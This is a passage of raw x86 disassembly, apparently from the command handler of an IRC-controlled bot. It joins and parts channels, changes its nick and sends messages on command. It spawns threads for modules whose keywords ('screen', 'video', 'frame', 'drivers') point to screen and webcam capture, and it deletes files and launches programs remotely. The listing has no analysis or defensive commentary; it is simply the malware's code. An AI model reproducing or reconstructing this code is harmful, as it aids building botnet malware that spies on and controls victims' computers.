loc_40880A: ; CODE XREF: sub_401C87+6B91�j
push 32h
call ds:dword_4F534C ; Sleep
loc_408812: ; CODE XREF: sub_401C87+6B70�j
cmp [ebp+var_23B0], ebx
jz short loc_40880A
jmp loc_406F1E
; ---------------------------------------------------------------------------
loc_40881F: ; CODE XREF: sub_401C87+6A35�j
push offset dword_442A88
jmp loc_40649E
; ---------------------------------------------------------------------------
loc_408829: ; CODE XREF: sub_401C87+4B25�j
; sub_401C87+4B3C�j
push [ebp+var_8C]
push offset a332_2 ; "332"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4076C4
cmp [ebp+var_C], ebx
jz loc_4076C4
push edi
push [ebp+var_C]
call sub_41EBB0
push eax
lea eax, [ebp+var_2C0]
push [ebp+var_88]
push [ebp+var_8C]
push [ebp+var_90]
push offset aSSSS_0 ; "%s %s %s :%s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push 1FFh
push eax
push [ebp+arg_0]
call sub_41E510
push [ebp+arg_10]
call sub_41E710
add esp, 30h
test eax, eax
jle short loc_4088B2
push [ebp+arg_10]
call sub_41E710
imul eax, 3E8h
pop ecx
push eax
call ds:dword_4F534C ; Sleep
loc_4088B2: ; CODE XREF: sub_401C87+6C13�j
push offset dword_442AE4
call sub_415A3C
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_409C2A
; ---------------------------------------------------------------------------
loc_4088C6: ; CODE XREF: sub_401C87+4AF7�j
; sub_401C87+4B0E�j
push [ebp+var_8C]
push offset dword_442AF8
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4076C4
cmp [ebp+var_C], ebx
jz loc_409A67
push edi
push [ebp+var_C]
call sub_41EBB0
inc edi
push offset aRepeat_0 ; "repeat"
push edi
mov esi, eax
call sub_41F7E0
add esp, 10h
test eax, eax
push esi
lea eax, [ebp+var_2C0]
jz short loc_408981
push [ebp+var_88]
push [ebp+var_8C]
push [ebp+var_90]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push 1FFh
push eax
push [ebp+arg_0]
call sub_41E510
push esi
lea eax, [ebp+var_2C0]
push offset dword_442B14
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
push [ebp+arg_10]
call sub_41E710
add esp, 38h
test eax, eax
jle loc_409A67
push [ebp+arg_10]
call sub_41E710
add eax, [ebp+arg_24]
pop ecx
jmp loc_409C2A
; ---------------------------------------------------------------------------
loc_408981: ; CODE XREF: sub_401C87+6C85�j
push offset unk_442B2C
jmp loc_40922B
; ---------------------------------------------------------------------------
loc_40898B: ; CODE XREF: sub_401C87+4AC9�j
; sub_401C87+4AE0�j
push 7Fh
lea eax, [ebp+var_2214]
push [ebp+arg_10]
push eax
call sub_41E510
push 7Fh
lea eax, [ebp+var_2194]
push edi
push eax
call sub_41E510
push 7Fh
lea eax, [ebp+var_2114]
push [ebp+var_88]
push eax
call sub_41E510
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_2090], eax
mov eax, [ebp+var_8]
push edi
mov [ebp+var_208C], eax
push [ebp+arg_10]
lea eax, [ebp+var_2C0]
mov [ebp+var_2218], esi
push offset unk_442B60
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 0Fh
push eax
call sub_40B691
add esp, 40h
mov [ebp+var_2094], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2218]
push ebx
push eax
push offset sub_414C64
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_2094]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_408A4F
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442B94
jmp loc_408B13
; ---------------------------------------------------------------------------
loc_408A47: ; CODE XREF: sub_401C87+6DCE�j
push 32h
call ds:dword_4F534C ; Sleep
loc_408A4F: ; CODE XREF: sub_401C87+6DAD�j
cmp [ebp+var_2088], ebx
jz short loc_408A47
jmp loc_408B22
; ---------------------------------------------------------------------------
loc_408A5C: ; CODE XREF: sub_401C87+4A9B�j
; sub_401C87+4AB2�j
push 7Fh
lea eax, [ebp+var_23A8]
push [ebp+arg_10]
push eax
call sub_41E510
push 7Fh
lea eax, [ebp+var_2328]
push edi
push eax
call sub_41E510
push 7Fh
lea eax, [ebp+var_22A8]
push [ebp+var_88]
push eax
call sub_41E510
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_2224], eax
mov eax, [ebp+var_8]
push edi
mov [ebp+var_2220], eax
push [ebp+arg_10]
lea eax, [ebp+var_2C0]
mov [ebp+var_23AC], esi
push offset dword_442BD0
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 11h
push eax
call sub_40B691
add esp, 40h
mov [ebp+var_2228], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_23AC]
push ebx
push eax
push offset sub_41440C
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_2228]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_408B4A
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_442BFC
loc_408B13: ; CODE XREF: sub_401C87+6DBB�j
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
add esp, 0Ch
loc_408B22: ; CODE XREF: sub_401C87+6DD0�j
; sub_401C87+6ECB�j
cmp [ebp+var_8], ebx
jnz loc_40758A
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push esi
jmp loc_407582
; ---------------------------------------------------------------------------
loc_408B42: ; CODE XREF: sub_401C87+6EC9�j
push 32h
call ds:dword_4F534C ; Sleep
loc_408B4A: ; CODE XREF: sub_401C87+6E7E�j
cmp [ebp+var_221C], ebx
jz short loc_408B42
jmp short loc_408B22
; ---------------------------------------------------------------------------
loc_408B54: ; CODE XREF: sub_401C87+4A6D�j
; sub_401C87+4A84�j
push edi
lea eax, [ebp+var_2C0]
push offset aPartS_0 ; "PART %s"
push eax
call sub_41EA60
push [ebp+arg_10]
call sub_41E710
add esp, 10h
test eax, eax
jle loc_409A67
push [ebp+arg_10]
call sub_41E710
cmp eax, 400h
pop ecx
jge loc_409A67
lea eax, [ebp+var_2C0]
push eax
push offset aS_22 ; "%s\r\n"
loc_408B99: ; CODE XREF: sub_401C87+6F7D�j
; sub_401C87+7B03�j
push [ebp+arg_10]
call sub_41E710
imul eax, 234h
pop ecx
push ds:dword_455F0C[eax]
call sub_409C2F
jmp loc_404AE3
; ---------------------------------------------------------------------------
loc_408BB8: ; CODE XREF: sub_401C87+4A3F�j
; sub_401C87+4A56�j
push [ebp+esi+var_84]
lea eax, [ebp+var_2C0]
push edi
push offset aJoinSS_1 ; "JOIN %s %s"
push eax
call sub_41EA60
push [ebp+arg_10]
call sub_41E710
add esp, 14h
test eax, eax
jle loc_409A67
push [ebp+arg_10]
call sub_41E710
cmp eax, 400h
pop ecx
jge loc_409A67
lea eax, [ebp+var_2C0]
push eax
push offset aS_23 ; "%s\r\n"
jmp short loc_408B99
; ---------------------------------------------------------------------------
loc_408C06: ; CODE XREF: sub_401C87+4A11�j
; sub_401C87+4A28�j
push edi
lea eax, [ebp+var_2C0]
push offset aNickS_6 ; "NICK %s"
push eax
call sub_41EA60
mov esi, [ebp+arg_10]
push esi
call sub_41E710
add esp, 10h
test eax, eax
jle loc_409A67
push esi
call sub_41E710
cmp eax, 400h
pop ecx
jge loc_409A67
lea eax, [ebp+var_2C0]
push eax
push offset aS_24 ; "%s\r\n"
push esi
call sub_41E710
imul eax, 234h
pop ecx
push ds:dword_455F0C[eax]
call sub_409C2F
push edi
push esi
push offset dword_442C6C
loc_408C69: ; CODE XREF: sub_401C87+706A�j
; sub_401C87+70D6�j ...
call sub_415AB0
jmp loc_404408
; ---------------------------------------------------------------------------
loc_408C73: ; CODE XREF: sub_401C87+49E3�j
; sub_401C87+49FA�j
cmp [ebp+var_C], ebx
jz loc_409A67
push edi
push [ebp+var_C]
call sub_41EBB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_408CA2
push esi
lea eax, [ebp+var_2C0]
push offset dword_442C88
push eax
call sub_41EA60
add esp, 0Ch
loc_408CA2: ; CODE XREF: sub_401C87+7004�j
mov edi, [ebp+arg_10]
push edi
call sub_41E710
test eax, eax
pop ecx
jle loc_409A67
push edi
call sub_41E710
cmp eax, 400h
pop ecx
jge loc_409A67
lea eax, [ebp+var_2C0]
push eax
push offset dword_442C90
push edi
call sub_41E710
imul eax, 234h
pop ecx
push ds:dword_455F0C[eax]
call sub_409C2F
push esi
push edi
push offset dword_442C98
jmp loc_408C69
; ---------------------------------------------------------------------------
loc_408CF6: ; CODE XREF: sub_401C87+49B5�j
; sub_401C87+49CC�j
cmp [ebp+var_C], ebx
jz loc_409A67
push edi
push [ebp+var_C]
call sub_41EBB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409A67
mov edi, [ebp+arg_10]
push edi
call sub_41E710
test eax, eax
pop ecx
jle loc_409A67
push edi
call sub_41E710
cmp eax, 400h
pop ecx
jge loc_409A67
push esi
push offset dword_442CB4
push edi
call sub_41E710
imul eax, 234h
pop ecx
push ds:dword_455F0C[eax]
call sub_409C2F
push esi
push edi
push offset dword_442CBC
jmp loc_408C69
; ---------------------------------------------------------------------------
loc_408D62: ; CODE XREF: sub_401C87+4987�j
; sub_401C87+499E�j
cmp [ebp+var_C], ebx
jz loc_409A67
push [ebp+arg_10]
push [ebp+var_C]
call sub_41EBB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409A67
push esi
push offset dword_442CD8
push [ebp+arg_4]
call sub_409C2F
push esi
push offset unk_442CE4
loc_408D96: ; CODE XREF: sub_401C87+7CAA�j
; sub_401C87+7CC7�j ...
call sub_415AB0
jmp loc_40368A
; ---------------------------------------------------------------------------
loc_408DA0: ; CODE XREF: sub_401C87+4959�j
; sub_401C87+4970�j
push [ebp+var_8C]
push offset a332_3 ; "332"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4076C4
push edi
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+arg_4]
call sub_409C2F
push [ebp+arg_10]
call sub_41E710
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_4F534C ; Sleep
push [ebp+esi+var_84]
push edi
push offset aJoinSS_2 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409C2F
push offset dword_442D20
call sub_415A3C
jmp loc_40368A
; ---------------------------------------------------------------------------
loc_408E04: ; CODE XREF: sub_401C87+492B�j
; sub_401C87+4942�j
cmp [ebp+var_C], ebx
jz loc_409A67
push [ebp+arg_10]
call sub_41BC70
push [ebp+arg_8]
mov esi, eax
call sub_41BC70
add eax, [ebp+var_C]
push edi
lea eax, [eax+esi+2]
push eax
call sub_41EBB0
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409A67
push esi
lea eax, [ebp+var_2C0]
push offset dword_442D34
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push ebx
push eax
push [ebp+arg_10]
push [ebp+arg_4]
call sub_409C75
push esi
push [ebp+arg_10]
push offset unk_442D40
call sub_415AB0
add esp, 2Ch
jmp loc_409A67
; ---------------------------------------------------------------------------
loc_408E76: ; CODE XREF: sub_401C87+48FD�j
; sub_401C87+4914�j
cmp [ebp+var_C], ebx
jz loc_409A67
push [ebp+arg_10]
call sub_41BC70
push [ebp+arg_8]
mov esi, eax
call sub_41BC70
add eax, [ebp+var_C]
push edi
lea eax, [eax+esi+2]
push eax
call sub_41EBB0
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409A67
push ebx
push ebx
push esi
push [ebp+arg_10]
push [ebp+arg_4]
call sub_409C75
push esi
push [ebp+arg_10]
push offset unk_442D5C
call sub_415AB0
add esp, 20h
jmp loc_409A67
; ---------------------------------------------------------------------------
loc_408ED0: ; CODE XREF: sub_401C87+48CF�j
; sub_401C87+48E6�j
cmp [ebp+var_C], ebx
jz loc_4076C4
push edi
push [ebp+var_C]
call sub_41EBB0
pop ecx
cmp eax, ebx
pop ecx
jz loc_4076C4
push eax
push [ebp+arg_10]
call sub_415944
push [ebp+arg_10]
lea eax, [ebp+var_2C0]
push offset unk_442D7C
push eax
call sub_41EA60
add esp, 14h
jmp loc_407569
; ---------------------------------------------------------------------------
loc_408F11: ; CODE XREF: sub_401C87+48A1�j
; sub_401C87+48B8�j
push edi
push [ebp+arg_10]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_419036
jmp loc_40427B
; ---------------------------------------------------------------------------
loc_408F2B: ; CODE XREF: sub_401C87+4863�j
; sub_401C87+4878�j
push [ebp+arg_10]
push [ebp+arg_1C]
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz loc_409A67
mov esi, [ebp+esi+var_88]
cmp esi, ebx
jz short loc_408FC6
push esi
push [ebp+var_C]
call sub_41EBB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
lea eax, [ebp+var_2C0]
jz short loc_408FB4
push esi
push [ebp+var_88]
push [ebp+var_8C]
push [ebp+var_90]
push offset aSSSS_1 ; "%s %s %s :%s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push 1FFh
push eax
push [ebp+arg_0]
call sub_41E510
push esi
lea eax, [ebp+var_2C0]
push [ebp+arg_10]
push offset unk_442DAC
push eax
call sub_41EA60
add esp, 34h
inc [ebp+arg_24]
jmp loc_409398
; ---------------------------------------------------------------------------
loc_408FB4: ; CODE XREF: sub_401C87+72D9�j
push offset unk_442DD4
push eax
call sub_41EA60
pop ecx
pop ecx
jmp loc_409398
; ---------------------------------------------------------------------------
loc_408FC6: ; CODE XREF: sub_401C87+72C2�j
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41B975
add esp, 0Ch
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
push [ebp+arg_10]
lea eax, [ebp+var_2C0]
push offset dword_442E04
push 200h
push eax
call sub_41EC30
add esp, 24h
jmp loc_409398
; ---------------------------------------------------------------------------
loc_40900F: ; CODE XREF: sub_401C87+4839�j
; sub_401C87+484E�j
push offset aScreen ; "screen"
push [ebp+arg_10]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40906A
mov edi, [ebp+esi+var_88]
cmp edi, ebx
jz short loc_409057
push edi
call sub_415D1B
cmp eax, 1
pop ecx
lea eax, [ebp+var_2C0]
jnz short loc_409050
push edi
push offset unk_442E28
push eax
call sub_41EA60
add esp, 0Ch
jmp short loc_40906A
; ---------------------------------------------------------------------------
loc_409050: ; CODE XREF: sub_401C87+73B6�j
push offset unk_442E54
jmp short loc_409062
; ---------------------------------------------------------------------------
loc_409057: ; CODE XREF: sub_401C87+73A4�j
push offset unk_442E84
lea eax, [ebp+var_2C0]
loc_409062: ; CODE XREF: sub_401C87+73CE�j
push eax
call sub_41EA60
pop ecx
pop ecx
loc_40906A: ; CODE XREF: sub_401C87+7399�j
; sub_401C87+73C7�j
push offset aDrivers ; "drivers"
push [ebp+arg_10]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4090F7
xor edi, edi
loc_40907F: ; CODE XREF: sub_401C87+745B�j
lea eax, [ebp+var_53F8]
push 1FFh
push eax
lea eax, [ebp+var_4EF0]
push 0FFh
push eax
push edi
call ds:dword_4E2FF8
test eax, eax
jz short loc_4090DE
lea eax, [ebp+var_53F8]
push eax
lea eax, [ebp+var_4EF0]
push eax
push edi
lea eax, [ebp+var_5D88]
push offset unk_442EC8
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_5D88]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 28h
loc_4090DE: ; CODE XREF: sub_401C87+7419�j
inc edi
cmp edi, 0Ah
jl short loc_40907F
lea eax, [ebp+var_2C0]
push offset unk_442EF0
push eax
call sub_41EA60
pop ecx
pop ecx
loc_4090F7: ; CODE XREF: sub_401C87+73F4�j
push offset aFrame ; "frame"
push [ebp+arg_10]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_409198
cmp [ebp+esi+var_88], ebx
jz short loc_409185
cmp [ebp+esi+var_84], ebx
jz short loc_409185
mov edi, [ebp+esi+var_80]
cmp edi, ebx
jz short loc_409185
mov eax, [ebp+esi+var_7C]
cmp eax, ebx
jz short loc_409185
push eax
call sub_41E710
pop ecx
push eax
push edi
call sub_41E710
pop ecx
push eax
push [ebp+esi+var_84]
call sub_41E710
pop ecx
push eax
push [ebp+esi+var_88]
call sub_415F56
add esp, 10h
test eax, eax
lea eax, [ebp+var_2C0]
jnz short loc_40917E
push [ebp+esi+var_88]
push offset unk_442F20
push eax
call sub_41EA60
add esp, 0Ch
jmp short loc_409198
; ---------------------------------------------------------------------------
loc_40917E: ; CODE XREF: sub_401C87+74DE�j
push offset unk_442F4C
jmp short loc_409190
; ---------------------------------------------------------------------------
loc_409185: ; CODE XREF: sub_401C87+748E�j
; sub_401C87+7497�j ...
push offset unk_442F80
lea eax, [ebp+var_2C0]
loc_409190: ; CODE XREF: sub_401C87+74FC�j
push eax
call sub_41EA60
pop ecx
pop ecx
loc_409198: ; CODE XREF: sub_401C87+7481�j
; sub_401C87+74F5�j
push offset aVideo ; "video"
push [ebp+arg_10]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_409377
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_1C], eax
jz loc_409243
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_0], eax
jz short loc_409243
mov eax, [ebp+esi+var_80]
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_409243
mov edi, [ebp+esi+var_7C]
cmp edi, ebx
jz short loc_409243
mov esi, [ebp+esi+var_78]
cmp esi, ebx
jz short loc_409243
push esi
call sub_41E710
pop ecx
push eax
push edi
call sub_41E710
pop ecx
push eax
push [ebp+arg_18]
call sub_41E710
pop ecx
push eax
push [ebp+arg_0]
call sub_41E710
pop ecx
push eax
push [ebp+arg_1C]
call sub_41614F
add esp, 14h
test eax, eax
lea eax, [ebp+var_2C0]
jnz short loc_409239
push [ebp+arg_1C]
push offset unk_442FC0
loc_40922B: ; CODE XREF: sub_401C87+6CFF�j
push eax
call sub_41EA60
add esp, 0Ch
jmp loc_409377
; ---------------------------------------------------------------------------
loc_409239: ; CODE XREF: sub_401C87+759A�j
push offset unk_442FF0
jmp loc_40936F
; ---------------------------------------------------------------------------
loc_409243: ; CODE XREF: sub_401C87+7534�j
; sub_401C87+7546�j ...
push offset dword_443030
lea eax, [ebp+var_2C0]
jmp loc_40936F
; ---------------------------------------------------------------------------
loc_409253: ; CODE XREF: sub_401C87+4020�j
; sub_401C87+4035�j
push offset word_44306E
push [ebp+arg_10]
call sub_41E490
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz short loc_4092D1
mov esi, 200h
push edi
lea eax, [ebp+var_2C0]
push esi
push eax
call sub_41EFB0
add esp, 0Ch
jmp short loc_4092AB
; ---------------------------------------------------------------------------
loc_409280: ; CODE XREF: sub_401C87+7626�j
push 1
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
push edi
lea eax, [ebp+var_2C0]
push esi
push eax
call sub_41EFB0
add esp, 20h
loc_4092AB: ; CODE XREF: sub_401C87+75F7�j
test eax, eax
jnz short loc_409280
push edi
call sub_41BCF0
push [ebp+arg_10]
lea eax, [ebp+var_2C0]
push offset unk_443070
push eax
call sub_41EA60
add esp, 10h
jmp loc_406F3F
; ---------------------------------------------------------------------------
loc_4092D1: ; CODE XREF: sub_401C87+75DF�j
push [ebp+arg_10]
push offset dword_443094
jmp loc_406F0F
; ---------------------------------------------------------------------------
loc_4092DE: ; CODE XREF: sub_401C87+3FF6�j
; sub_401C87+400B�j
cmp [ebp+var_C], ebx
jz loc_409A67
push [ebp+arg_10]
push [ebp+var_C]
call sub_41EBB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409A67
push offset word_4430B6
push esi
call sub_41F630
push esi
call sub_41A6D9
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2C0]
jnz short loc_409323
push offset unk_4430B8
jmp short loc_40936F
; ---------------------------------------------------------------------------
loc_409323: ; CODE XREF: sub_401C87+7693�j
push esi
push offset dword_4430E4
push eax
call sub_41EA60
add esp, 0Ch
jmp short loc_409398
; ---------------------------------------------------------------------------
loc_409334: ; CODE XREF: sub_401C87+3FCC�j
; sub_401C87+3FE1�j
cmp [ebp+var_C], ebx
jz loc_409A67
push [ebp+arg_10]
push [ebp+var_C]
call sub_41EBB0
pop ecx
cmp eax, ebx
pop ecx
jz loc_409A67
push eax
call sub_418CE5
test eax, eax
pop ecx
lea eax, [ebp+var_2C0]
jnz short loc_40936A
push offset unk_4430FC
jmp short loc_40936F
; ---------------------------------------------------------------------------
loc_40936A: ; CODE XREF: sub_401C87+76DA�j
push offset dword_44311C
loc_40936F: ; CODE XREF: sub_401C87+75B7�j
; sub_401C87+75C7�j ...
push eax
call sub_41EA60
pop ecx
pop ecx
loc_409377: ; CODE XREF: sub_401C87+7522�j
; sub_401C87+75AD�j
cmp [ebp+var_8], ebx
jnz short loc_409398
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
loc_409398: ; CODE XREF: sub_401C87+7328�j
; sub_401C87+733A�j ...
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
pop ecx
jmp loc_409A67
; ---------------------------------------------------------------------------
loc_4093AA: ; CODE XREF: sub_401C87+3FA2�j
; sub_401C87+3FB7�j
push 7Fh
lea eax, [ebp+var_2080]
push [ebp+arg_10]
push eax
call sub_41E510
mov esi, [ebp+esi+var_88]
add esp, 0Ch
cmp esi, ebx
jz short loc_4093DB
push 7Fh
lea eax, [ebp+var_2000]
push esi
push eax
call sub_41E510
add esp, 0Ch
loc_4093DB: ; CODE XREF: sub_401C87+7740�j
push 7Fh
lea eax, [ebp+var_1F80]
push [ebp+var_88]
push eax
call sub_41E510
mov eax, [ebp+arg_4]
push [ebp+arg_10]
mov [ebp+var_2084], eax
mov eax, [ebp+var_8]
mov [ebp+var_1EFC], eax
mov eax, [ebp+var_4]
mov [ebp+var_1EF8], eax
lea eax, [ebp+var_2C0]
push offset dword_443138
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 1Ch
push eax
call sub_40B691
add esp, 24h
mov [ebp+var_1F00], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2084]
push ebx
push eax
push offset sub_41BA41
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1F00]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_40947E
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_443150
jmp loc_4045FF
; ---------------------------------------------------------------------------
loc_409476: ; CODE XREF: sub_401C87+77FD�j
push 32h
call ds:dword_4F534C ; Sleep
loc_40947E: ; CODE XREF: sub_401C87+77DC�j
cmp [ebp+var_1EF4], ebx
jz short loc_409476
jmp loc_406F3F
; ---------------------------------------------------------------------------
loc_40948B: ; CODE XREF: sub_401C87+3F78�j
; sub_401C87+3F8D�j
push ebx
push [ebp+var_88]
push [ebp+arg_4]
push [ebp+arg_10]
call sub_410287
push [ebp+arg_10]
push offset dword_443190
jmp loc_408C69
; ---------------------------------------------------------------------------
loc_4094AA: ; CODE XREF: sub_401C87+3F4E�j
; sub_401C87+3F63�j
push 14h
lea eax, [ebp+var_1D48]
push ebx
push eax
call sub_41E4B0
push [ebp+arg_10]
lea eax, [ebp+var_1D34]
push offset dword_4431A8
push eax
call sub_41EA60
mov eax, [ebp+arg_4]
mov [ebp+var_1D50], eax
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_1C30]
push 80h
push eax
call sub_41EC30
mov eax, [ebp+var_4]
mov [ebp+var_1BA8], eax
mov eax, [ebp+var_8]
mov [ebp+var_1BA4], eax
lea eax, [ebp+var_1C30]
push eax
lea eax, [ebp+var_1D34]
push eax
lea eax, [ebp+var_2C0]
push offset unk_4431AC
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 1Ah
push eax
call sub_40B691
add esp, 40h
mov [ebp+var_1BAC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1D50]
push ebx
push eax
push offset sub_416788
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1BAC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_40957F
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4431D0
jmp loc_4085EB
; ---------------------------------------------------------------------------
loc_409577: ; CODE XREF: sub_401C87+78FE�j
push 32h
call ds:dword_4F534C ; Sleep
loc_40957F: ; CODE XREF: sub_401C87+78DD�j
cmp [ebp+var_1BA0], ebx
jz short loc_409577
jmp loc_402593
; ---------------------------------------------------------------------------
loc_40958C: ; CODE XREF: sub_401C87+3F24�j
; sub_401C87+3F39�j
push [ebp+arg_10]
call ds:dword_4F5354 ; DeleteFileA
test eax, eax
jz short loc_4095A3
push [ebp+arg_10]
push offset dword_44320C
jmp short loc_4095AE
; ---------------------------------------------------------------------------
loc_4095A3: ; CODE XREF: sub_401C87+7910�j
push offset dword_443228
call sub_418C20
push eax
loc_4095AE: ; CODE XREF: sub_401C87+791A�j
lea eax, [ebp+var_2C0]
push 200h
push eax
call sub_41EC30
loc_4095BF: ; CODE XREF: sub_401C87+7A0D�j
add esp, 10h
jmp loc_406F1E
; ---------------------------------------------------------------------------
loc_4095C7: ; CODE XREF: sub_401C87+3EFA�j
; sub_401C87+3F0F�j
push [ebp+arg_10]
call sub_41E710
push eax
call sub_41A652
xor esi, esi
pop ecx
inc esi
pop ecx
push [ebp+arg_10]
cmp eax, esi
lea eax, [ebp+var_2C0]
jnz short loc_4095EE
push offset unk_443234
jmp short loc_4095F3
; ---------------------------------------------------------------------------
loc_4095EE: ; CODE XREF: sub_401C87+795E�j
push offset unk_443258
loc_4095F3: ; CODE XREF: sub_401C87+7965�j
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_406F42
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
jmp loc_406F42
; ---------------------------------------------------------------------------
loc_409626: ; CODE XREF: sub_401C87+3ED0�j
; sub_401C87+3EE5�j
push ebx
push ebx
push [ebp+arg_10]
push [ebp+var_4]
push ebx
push [ebp+arg_4]
call sub_41A334
add esp, 18h
cmp eax, 1
push [ebp+arg_10]
jnz short loc_40964C
push offset unk_443288
jmp loc_406F0F
; ---------------------------------------------------------------------------
loc_40964C: ; CODE XREF: sub_401C87+79B9�j
push offset unk_4432A8
jmp loc_406F0F
; ---------------------------------------------------------------------------
loc_409656: ; CODE XREF: sub_401C87+3EA6�j
; sub_401C87+3EBB�j
mov esi, [ebp+arg_10]
push esi
call ds:dword_4E3008 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_2D4], eax
jz short loc_409699
push 2
lea eax, [ebp+var_2D4]
push 4
push eax
call ds:dword_4E2F80 ; gethostbyaddr
cmp eax, ebx
jz short loc_4096BA
push dword ptr [eax]
push esi
push offset unk_4432D8
loc_409688: ; CODE XREF: sub_401C87+7A31�j
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
jmp loc_4095BF
; ---------------------------------------------------------------------------
loc_409699: ; CODE XREF: sub_401C87+79E2�j
push esi
call ds:dword_4E304C ; gethostbyname
cmp eax, ebx
jz short loc_4096BA
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call ds:dword_4E3054 ; inet_ntoa
push eax
push esi
push offset unk_4432F8
jmp short loc_409688
; ---------------------------------------------------------------------------
loc_4096BA: ; CODE XREF: sub_401C87+79F7�j
; sub_401C87+7A1B�j
push offset unk_443318
jmp loc_40649E
; ---------------------------------------------------------------------------
loc_4096C4: ; CODE XREF: sub_401C87+3E7C�j
; sub_401C87+3E91�j
push 7Fh
push [ebp+arg_10]
push [ebp+arg_14]
call sub_41E510
push [ebp+arg_10]
lea eax, [ebp+var_2C0]
push offset unk_443340
push eax
call sub_41EA60
add esp, 18h
jmp loc_407148
; ---------------------------------------------------------------------------
loc_4096ED: ; CODE XREF: sub_401C87+3E52�j
; sub_401C87+3E67�j
push 5
push ebx
push ebx
push [ebp+arg_10]
push offset aOpen_1 ; "open"
push ebx
call ds:dword_4E2F34
push [ebp+arg_10]
test eax, eax
jz short loc_409711
push offset unk_443370
jmp loc_406F0F
; ---------------------------------------------------------------------------
loc_409711: ; CODE XREF: sub_401C87+7A7E�j
push offset unk_443390
jmp loc_406F0F
; ---------------------------------------------------------------------------
loc_40971B: ; CODE XREF: sub_401C87+3E28�j
; sub_401C87+3E3D�j
mov eax, [ebp+arg_10]
mov cl, [eax]
mov ds:byte_43F098, cl
movsx eax, byte ptr [eax]
push eax
push offset unk_4433B4
jmp loc_406190
; ---------------------------------------------------------------------------
loc_409734: ; CODE XREF: sub_401C87+3DFE�j
; sub_401C87+3E13�j
push [ebp+arg_10]
call sub_41E710
test eax, eax
pop ecx
jle loc_409A67
push [ebp+arg_10]
